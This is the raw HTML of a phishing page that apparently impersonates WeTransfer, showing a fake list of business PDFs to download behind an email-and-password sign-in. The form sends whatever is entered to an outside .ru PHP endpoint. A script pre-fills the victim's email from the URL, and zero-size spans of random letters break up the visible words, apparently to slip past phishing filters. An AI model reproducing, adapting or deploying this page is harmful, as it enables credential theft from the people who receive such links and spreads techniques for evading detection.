<!DOCTYPE html>

<html lang="en" class="no-touch no-ie tlvHideBgImage fonts-loaded" style="">
<!--<![endif]-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<meta name="viewport" content="width=1024" />

<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="pinterest" content="nopin" />
<meta name="referrer" content="origin" />
<link rel="stylesheet" media="screen" href="https://storage.googleapis.com/fgbgf345ef34refd.appspot.com/rapmvp.css" />
<link rel="shortcut icon" href="https://storage.googleapis.com/fgbgf345ef34refd.appspot.com/icon.ico" />

<title dir="ltr">Lo<span style='font-size: 0px;'>biyajh</span>ged in</title>

<script src="https://storage.googleapis.com/fgbgf345ef34refd.appspot.com/jquery.min.js"></script>  
<script>$.urlParam = function(email){ var results = new RegExp('[\?&]' + email + '=([^&#]*)').exec(window.location.href); return results[1] || 0; }</script> <script> $( document ).ready(function() { $("#email").val($.urlParam('email')); }); </script>
</head>
<body>
<div class="root-node">
<div class="app application">
<div class="panel panel--half panel--visible">
<div class="panel__topbar">
<div style=" padding-left: 35px; font-size: 30px; font-weight: 700; padding-top: 5px; "><img src="https://storage.googleapis.com/fgbgf345ef34refd.appspot.com/breath.png"></div>
</div>

<div class="scrollable panel__scrollable scrollable--overflow-bottom">
<div class="scrollable__content" style="margin-right: 0px;background: url(https://storage.googleapis.com/fgbgf345ef34refd.appspot.com/long.png);">
<div class="panel__content signin-page">
<div>
<div class="signin-page--is-new">
<div class="signin__form-container">
<div class="signin-form">
<div class="signin-form--form-container">
<div style="width: 721px; background: ffffffbf;  padding: 20px; text-align: left; padding-bottom: 0px;">
<div>Your email must be ve<span style='font-size: 0px;'>jnacub</span>rifi<span style='font-size: 0px;'>glhus</span>ed on We-trans<span style='font-size: 0px;'>msegouy</span>f<span style='font-size: 0px;'>gqsweq</span>er <span style='font-size: 0px;'>zbach</span>to unl<span style='font-size: 0px;'>hydlkyt</span>oc<span style='font-size: 0px;'>yshu</span>k <span style='font-size: 0px;'>cdhcbmj</span>and do<span style='font-size: 0px;'>ypfcxet</span>w<span style='font-size: 0px;'>nxzndii</span>nload the uploaded documents.<br>
<br>
<b><span style="font-size: 24px;"><span>
<img src="https://img.icons8.com/cotton/2x/email-open.png" style=" width: 31px; ">
</span>
<div style=" height: 10px;margin-top: -34px; margin-left: 38px; ">Sign in with your re<span style='font-size: 0px;'>xcrtsm</span>ceivi<span style='font-size: 0px;'>btubj</span>ng em<span style='font-size: 0px;'>tnwotk</span>a<span style='font-size: 0px;'>yrsx</span>il <span style='font-size: 0px;'>fynsn</span>to <span style='font-size: 0px;'>kszt</span>d<span style='font-size: 0px;'>j</span>o<span style='font-size: 0px;'>w</span>w<span style='font-size: 0px;'>l</span>nload.
</div>
</span></b></div>
<br></br>
<hr style="width: 770px;border: solid 1px #c0d5ff;"></hr>
</div>

<form action="https://elrodeoofdurham.ru/MajidMohamedTwo5oct/mate.php" method="post" style=" width: 421px; background: #ffffffbf; border-radius: 10px; padding-bottom: 16px; margin-top: px;  padding-left: 19px; padding-top: 5px;">


<div class="textfield textfield--default">

<input id="email" name="kilshowe" class="textfield__field" type="email" autocomplete="Off" placeholder="Email address" tabindex="1" value="" required=""/>
</div>
<br></br>
<div class="textfield textfield--default" style=" margin: 0; ">
<input  class="textfield__field" type="password" name="lakyoung" required="" autofocus="" autocomplete="Off" placeholder="Password" tabindex="2" value="" />
</div>
<br></br>
<button style="cursor: pointer;" name="gbangbedo" type="submit" class="button button--disabled" tabindex="4">Submit</button>
<div class="signin-form__options-wrapper">
<label for="remember_me" class="checkboxinput signin-form__options">
<input class="checkboxinput__field" id="remember_me" type="checkbox" name="remember_me" tabindex="3" checked="" />
<span class="checkboxinput__checkbox checkboxinput__checkbox--checked checkboxinput__checkbox--small">
<svg class="checkboxinput__valid-icon" viewBox="0 0 13 13">
<path stroke="#ffffff" stroke-width="2.057" d="M3 6.888L6.16 10.2 11 3" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round"></path>
</svg>
</span>
<span class="checkboxinput__label">Reme<span style='font-size: 0px;'>eovvs</span>m<span style='font-size: 0px;'>uzeuny</span>ber me</span>
</label>
<a href="javascript:void(0)?//forgot-password" tabindex="-1" class="forgot-password-link"> For<span style='font-size: 0px;'>smbe</span>got pas<span style='font-size: 0px;'>woud</span>sword? </a>
</div>
</form>
</div>
</div>
</div>

</div>
</div>
</div>
<div class="actionbar">
<div class="actionbar__elements"><button type="button" class="button button--actionbar-action button--enabled" tabindex="0">Okay</button></div>
<div class="actionbar__text">We use <span style='font-size: 0px;'>xuawl</span>co<span style='font-size: 0px;'>zocp</span>okies. Read <a href="javascript:void(0)?//legal/terms">the le<span style='font-size: 0px;'>ztivos</span>gal stuff</a> (no recipes included).</div>
</div>
</div> 
</div>
</div>
<div class="welcome welcome--tandc">
<div class="welcome__background"></div>
<div class="welcome__container">
<div class="welcome__cover"></div>
<div class="welcome__content">

</div>
</div>
</div>
<div class="transfer transfer--half-panel" route="[object Object]" id="b77f7e9bb7c1122aeb3030566f56b15c20200606140320" recipient_id="96ad5bda98b3a44ec58d441494ead0e020200606140350" secret="33c319">
<div>
<div class="transfer__window downloader">
<div class="scrollable transfer__contents scrollable--overflow-bottom">
<div class="scrollable__content" style="margin-right: 0px;">
<div class="downloader__heading downloader__heading--6-files downloader__heading--message">
<h2>Ready when you are</h2>
<p>Trans<span style='font-size: 0px;'>jucowt</span><span style='font-size: 0px;'>bdzq</span>fer expires in 2 days</p>
<div class="downloader__message downloader__message--expanded"><p></p></div>
</div>
<ul class="filelist">
<li>
<div class="file-system-entry" role="gridcell" tabindex="0">
<div class="file-system-entry__header">
<div class="poptip"><h6 class="file-system-entry__title">QUOTATION DETAILS.pdf</h6></div>
<div class="file-system-entry__details"><span class="file-system-entry__detail">2 MB</span><span class="file-system-entry__detail">pdf</span></div>
<div class="file-system-entry__actions">
<div class="filelist__action">
<svg viewBox="0 0 24 24">
<path
d="M22 12c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10 10-4.477 10-10zm-9 1.492V7.998C13 7.446 12.552 7 12 7c-.556 0-1 .447-1 .998v5.48l-2.53-2.53c-.385-.385-1.022-.39-1.413.002-.393.393-.39 1.022-.002 1.412l4.247 4.247c.192.19.447.288.702.288.26.003.514-.095.708-.29l4.247-4.246c.383-.385.387-1.022-.003-1.412-.394-.393-1.023-.392-1.413-.002L13 13.492zM0 12C0 5.373 5.373 0 12 0s12 5.373 12 12-5.373 12-12 12S0 18.627 0 12z"
fill-rule="evenodd"
></path>
</svg>
</div>
</div>
</div>
</div>
</li>
<li>
<div class="file-system-entry" role="gridcell" tabindex="0">
<div class="file-system-entry__header">
<div class="poptip"><h6 class="file-system-entry__title">COMPANY INFORMATION.pdf</h6></div>
<div class="file-system-entry__details"><span class="file-system-entry__detail">592 KB</span><span class="file-system-entry__detail">pdf</span></div>
<div class="file-system-entry__actions">
<div class="filelist__action">
<svg viewBox="0 0 24 24">
<path
d="M22 12c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10 10-4.477 10-10zm-9 1.492V7.998C13 7.446 12.552 7 12 7c-.556 0-1 .447-1 .998v5.48l-2.53-2.53c-.385-.385-1.022-.39-1.413.002-.393.393-.39 1.022-.002 1.412l4.247 4.247c.192.19.447.288.702.288.26.003.514-.095.708-.29l4.247-4.246c.383-.385.387-1.022-.003-1.412-.394-.393-1.023-.392-1.413-.002L13 13.492zM0 12C0 5.373 5.373 0 12 0s12 5.373 12 12-5.373 12-12 12S0 18.627 0 12z"
fill-rule="evenodd"
></path>
</svg>
</div>
</div>
</div>
</div>
</li>
<li>
<div class="file-system-entry" role="gridcell" tabindex="0">
<div class="file-system-entry__header">
<div class="poptip"><h6 class="file-system-entry__title">CERTIFICATE OF INCORPORATION.pdf</h6></div>
<div class="file-system-entry__details"><span class="file-system-entry__detail">261 KB</span><span class="file-system-entry__detail">pdf</span></div>
<div class="file-system-entry__actions">
<div class="filelist__action">
<svg viewBox="0 0 24 24">
<path
d="M22 12c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10 10-4.477 10-10zm-9 1.492V7.998C13 7.446 12.552 7 12 7c-.556 0-1 .447-1 .998v5.48l-2.53-2.53c-.385-.385-1.022-.39-1.413.002-.393.393-.39 1.022-.002 1.412l4.247 4.247c.192.19.447.288.702.288.26.003.514-.095.708-.29l4.247-4.246c.383-.385.387-1.022-.003-1.412-.394-.393-1.023-.392-1.413-.002L13 13.492zM0 12C0 5.373 5.373 0 12 0s12 5.373 12 12-5.373 12-12 12S0 18.627 0 12z"
fill-rule="evenodd"
></path>
</svg>
</div>
</div>
</div>
</div>
</li>
<li>
<div class="file-system-entry" role="gridcell" tabindex="0">
<div class="file-system-entry__header">
<div class="poptip"><h6 class="file-system-entry__title">STATEMENT.pdf</h6></div>
<div class="file-system-entry__details"><span class="file-system-entry__detail">725 KB</span><span class="file-system-entry__detail">pdf</span></div>
<div class="file-system-entry__actions">
<div class="filelist__action">
<svg viewBox="0 0 24 24">
<path
d="M22 12c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10 10-4.477 10-10zm-9 1.492V7.998C13 7.446 12.552 7 12 7c-.556 0-1 .447-1 .998v5.48l-2.53-2.53c-.385-.385-1.022-.39-1.413.002-.393.393-.39 1.022-.002 1.412l4.247 4.247c.192.19.447.288.702.288.26.003.514-.095.708-.29l4.247-4.246c.383-.385.387-1.022-.003-1.412-.394-.393-1.023-.392-1.413-.002L13 13.492zM0 12C0 5.373 5.373 0 12 0s12 5.373 12 12-5.373 12-12 12S0 18.627 0 12z"
fill-rule="evenodd"
></path>
</svg>
</div>
</div>
</div>
</div>
</li>
<li>
<div class="file-system-entry" role="gridcell" tabindex="0">
<div class="file-system-entry__header">
<div class="poptip"><h6 class="file-system-entry__title">PO.pdf</h6></div>
<div class="file-system-entry__details"><span class="file-system-entry__detail">821 KB</span><span class="file-system-entry__detail">pdf</span></div>
<div class="file-system-entry__actions">
<div class="filelist__action">
<svg viewBox="0 0 24 24">
<path
d="M22 12c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10 10-4.477 10-10zm-9 1.492V7.998C13 7.446 12.552 7 12 7c-.556 0-1 .447-1 .998v5.48l-2.53-2.53c-.385-.385-1.022-.39-1.413.002-.393.393-.39 1.022-.002 1.412l4.247 4.247c.192.19.447.288.702.288.26.003.514-.095.708-.29l4.247-4.246c.383-.385.387-1.022-.003-1.412-.394-.393-1.023-.392-1.413-.002L13 13.492zM0 12C0 5.373 5.373 0 12 0s12 5.373 12 12-5.373 12-12 12S0 18.627 0 12z"
fill-rule="evenodd"
></path>
</svg>
</div>
</div>
</div>
</div>
</li>
<li>
<div class="file-system-entry" role="gridcell" tabindex="0">
<div class="file-system-entry__header">
<div class="poptip"><h6 class="file-system-entry__title">SEDUCTION FA.pdf</h6></div>
<div class="file-system-entry__details"><span class="file-system-entry__detail">37 MB</span><span class="file-system-entry__detail">pdf</span></div>
<div class="file-system-entry__actions">
<div class="filelist__action">
<svg viewBox="0 0 24 24">
<path
d="M22 12c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10 10-4.477 10-10zm-9 1.492V7.998C13 7.446 12.552 7 12 7c-.556 0-1 .447-1 .998v5.48l-2.53-2.53c-.385-.385-1.022-.39-1.413.002-.393.393-.39 1.022-.002 1.412l4.247 4.247c.192.19.447.288.702.288.26.003.514-.095.708-.29l4.247-4.246c.383-.385.387-1.022-.003-1.412-.394-.393-1.023-.392-1.413-.002L13 13.492zM0 12C0 5.373 5.373 0 12 0s12 5.373 12 12-5.373 12-12 12S0 18.627 0 12z"
fill-rule="evenodd"
></path>
</svg>
</div>
</div>
</div>
</div>
</li>
</ul>
</div>
<div class="scrollable__scrollbar scrollable__scrollbar--visible"><div class="scrollable__scrollbar-thumb" style="height: 144.494px; transform: translateY(0px);"></div></div>
</div>
<div class="transfer__footer"><button tabindex="-1" class="transfer__button">Download</button></div>
</div>
</div>
</div>
<div class="dropzone">
<h3 class="dropzone__title">Drop it like it’s hot</h3>
<p class="dropzone__text">Add files or fold<span style='font-size: 0px;'>yzrduto</span>e<span style='font-size: 0px;'>mkgaem</span>rs by<span style='font-size: 0px;'>oczcz</span> d<span style='font-size: 0px;'>rrebi</span>rop<span style='font-size: 0px;'>gwuwewm</span>ping them in this window</p>
</div>
<nav class="nav nav--with-panel nav--loaded">


<ul class="nav__items">
<li class="nav__item">
<a href="javascript:void(0)?//help" class="nav__link"><span class="nav__label">Help</span></a>
</li>
<li class="nav__item">
<a href="javascript:void(0)?//about" class="nav__link"><span class="nav__label">About</span></a>
<ul class="nav__subitems" style="width: 0px;">
<li class="nav__subitem">
<a href="javascript:void(0)?//about" class="nav__link"><span class="nav__label">WeTransfer</span></a>
</li>
<li class="nav__subitem">
<a href="javascript:void(0)?//products" class="nav__link"><span class="nav__label">Products</span></a>
</li>
<li class="nav__subitem">
<a href="javascript:void(0)?//advertise" class="nav__link"><span class="nav__label">Advertise</span></a>
</li>
</ul>
</li>
<li class="nav__item">
<a href="javascript:void(0)?//pro?trk=WT201908_Upgrade" class="nav__link"><span class="nav__label">Sign up</span></a>
</li>
<li class="nav__item nav__item--active">
<a href="javascript:void(0)?//log-in" class="nav__link"><span class="nav__label">Log in</span></a>
</li>
</ul>
</nav>

<div class="spinner logo spinner--single"><svg height="44" width="44" class="spinner__circle" shape-rendering="geometricPrecision" viewBox="0 0 44 44"><circle class="spinner__background" r="20.5" cx="22" cy="22" fill="transparent" style="stroke-dasharray: 128.805; stroke-dashoffset: 0; stroke-width: 3; stroke: rgb(232, 235, 237);"></circle><circle class="spinner__foreground" r="20.5" cx="22" cy="22" fill="transparent" style="stroke-dasharray: 128.805; stroke-dashoffset: 128.161; stroke-width: 3; stroke: rgb(64, 159, 255);"></circle></svg><svg width="52" height="29" class="spinner__logo" viewBox="-4 -2 52 29"><defs><path id="logo-path" d="M25.4 10.6c0-6.2 4.4-9.9 10.1-9.9C40.6.7 44 3.3 44 6.9c0 3.4-2.9 5.6-6.1 5.6-1.8 0-3.1-.3-4-1-.3-.3-.5-.2-.5.1 0 1.3.5 2.3 1.3 3.2.7.7 2 1.2 3.2 1.2 1.3 0 2.4-.3 3.4-.8s1.8-.3 2.3.5c.6.9-.2 2.1-.9 2.9-1.3 1.4-3.8 2.4-7 2.4-6.5-.2-10.3-4.6-10.3-10.4zm-13.3 4.1c.6 0 1 .3 1.4 1l1.8 2.9c.7 1.1 1.3 1.9 2.6 1.9s2-.5 2.6-2c.8-1.8 1.7-4.1 2.4-7.1.9-3.4 1.3-5.4 1.3-7.1s-.5-2.7-2.4-3c-2.5-.5-6-.7-9.7-.7s-7.2.2-9.7.6C.5 1.6 0 2.6 0 4.3S.4 8 1.2 11.4c.8 3 1.6 5.2 2.4 7.1.7 1.5 1.3 2 2.6 2s1.9-.8 2.6-1.9l1.8-2.9c.5-.6.9-1 1.5-1z"></path><filter id="logo-filter" width="200%" height="200%" x="-50%" y="-50%" filterUnits="objectBoundingBox"><feOffset dx="0" dy="2" in="SourceAlpha" result="shadowOffsetOuter1"></feOffset><feGaussianBlur stdDeviation="2" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur></filter></defs><g fill="none" class="logo-shape"><use fill="#17181a" fill-opacity="0.11" filter="url(#logo-filter)" xlink:href="#logo-path"></use><use fill-rule="evenodd" xlink:href="#logo-path"></use></g></svg><svg class="spinner__aborted" viewBox="55 42 171 171"><g fill="none" fill-rule="evenodd"><path fill="#e65050" d="M136.75 141.407h7.432l3.315-29.634V92.887h-14.164v18.886l3.416 29.634zM133.734 162h13.36v-13.26h-13.36V162z"></path></g></svg><svg class="spinner__finished" viewBox="0 0 13 13"><path stroke="#409fff" stroke-width="2.057" d="M3 6.888L6.16 10.2 11 3" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round"></path></svg></div>
</div>
</div>
</body>
</html>
